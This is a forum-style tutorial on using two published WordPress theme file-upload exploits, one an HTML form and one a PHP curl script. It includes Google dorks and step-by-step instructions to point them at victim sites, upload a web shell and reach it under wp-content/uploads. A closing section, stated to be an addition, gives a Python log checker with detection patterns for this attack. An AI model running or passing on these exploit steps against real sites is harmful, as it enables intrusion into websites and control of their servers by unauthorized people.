How to use an exploit (CSRF / Remote File Upload vulnerability)
Many people ask: how do you use a CSRF / remote file upload exploit?
You will find exploits here:
1337day, exploit-db, packetstorm, etc. (find them with Google)
(HTML VERSION)
If you find an exploit that looks like this:
Code:
#############################
# Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability
# Author: Bebyyers404
# Date: 11/17/2013
# Infected Version: v3.x.x
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/Amplus_v3
##############################
#POC & EXPLOIT
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
#File path:
http://site.com/wordpress/wp-content/uploads/[FILE]
or
http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE]
######################################################################
How do you make it work?
Copy the exploit:
Code:
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
NOTE:
Replace http://127.0.0.1/ with your target (the vulnerable site you found).
Replace /Amplus_v3.x.x/ with the theme version used on the victim site.
Check the WordPress path before saving, because it is not the same on every site: WordPress may live at "www.site.com/blog", "www.site.com/wordpress", etc.
Paste it into Notepad and save it with an HTML extension, then open it in Firefox, Chrome, etc. You will see a form with an upload button. Now upload your shell/image, and use Tamper Data to view and modify HTTP/HTTPS headers and POST parameters.
(PHP VERSION)
If you find an exploit that looks like this:
Code:
#################################################################################
# Exploit Title: WordPress bordeaux-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/bordeaux/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/bordeaux-theme/"
# Tested on : Windows/Linux
#################################################################################
# Exploit
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
access shell : http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
#################################################################################
How do you make it work?
Copy the exploit:
Code:
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
NOTE:
You must have PHP set up in your environment variables so that PHP runs in CMD (Windows).
Replace http://127.0.0.1/ with your target (the vulnerable site you found).
Check the WordPress path before saving, because it is not the same on every site: WordPress may live at "www.site.com/blog", "www.site.com/wordpress", etc.
Paste it into Notepad and save it with a PHP extension in a folder, e.g. exploit.php.
Example:
I have an Exploit folder in the C:/ directory.
upload.php <-- this is the name of your shell in the exploit script; you can rename it to anything you like.
So I have upload.php and exploit.php in the same folder.
I will run the script with this command (CMD):
Code:
C:\Users\Diizzy>cd \Exploit
C:\Exploit>php exploit.php
And you can access the shell here: http://target.com/wordpress/wp-content/uploads/[YEARS]/[MONTH]/upload.php
Example:
Code:
http://target.com/wordpress/wp-content/uploads/2013/11/upload.php
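For defenders, both advisories above leave the same trace in web server logs: a POST to an upload handler inside a theme directory, followed by a request for a script under wp-content/uploads. The following Python check is an added example, not part of the original post; it assumes Combined Log Format, and the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Upload handlers shipped inside a theme, as in the two advisories on this page.
HANDLER = re.compile(r'/wp-content/themes/[^/]+/.*upload[-_]handler\.php$', re.I)
# Server-side script extensions that should never be requested from the uploads tree.
SCRIPT = re.compile(r'/wp-content/uploads/.*\.(php\d?|phtml|phar)$', re.I)

def find_upload_abuse(lines):
    """Return alerts for handler POSTs and script requests under uploads."""
    posted = set()   # client IPs that POSTed to a theme upload handler
    alerts = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, method, target = m.group(1, 2, 3)
        status = int(m.group(4))
        path = urlsplit(target).path  # drop any query string before matching
        if method == "POST" and HANDLER.search(path):
            posted.add(ip)
            alerts.append(("handler_post", ip, path, status))
        elif SCRIPT.search(path):
            # 200 means the server found (and probably executed) the file.
            kind = "script_served" if status == 200 else "script_probe"
            if ip in posted:
                kind += "_after_post"
            alerts.append((kind, ip, path, status))
    return alerts

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [17/Nov/2013:10:00:01 +0000] "POST /wordpress/wp-content/themes/bordeaux-theme/functions/upload-handler.php HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [17/Nov/2013:10:00:05 +0000] "GET /wordpress/wp-content/uploads/2013/11/upload.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [17/Nov/2013:10:01:00 +0000] "GET /wordpress/wp-content/uploads/2013/11/photo.jpg HTTP/1.1" 200 9000 "-" "-"',
    '198.51.100.9 - - [17/Nov/2013:10:02:00 +0000] "GET /wordpress/wp-content/uploads/2013/11/x.php?c=1 HTTP/1.1" 404 120 "-" "-"',
]

if __name__ == "__main__":
    for alert in find_upload_abuse(SAMPLE):
        print(alert)
```

A `script_served_after_post` alert means the upload very likely succeeded and the file should be treated as a web shell. The durable fix is to remove or update the vulnerable theme and to stop the web server from executing scripts anywhere under wp-content/uploads.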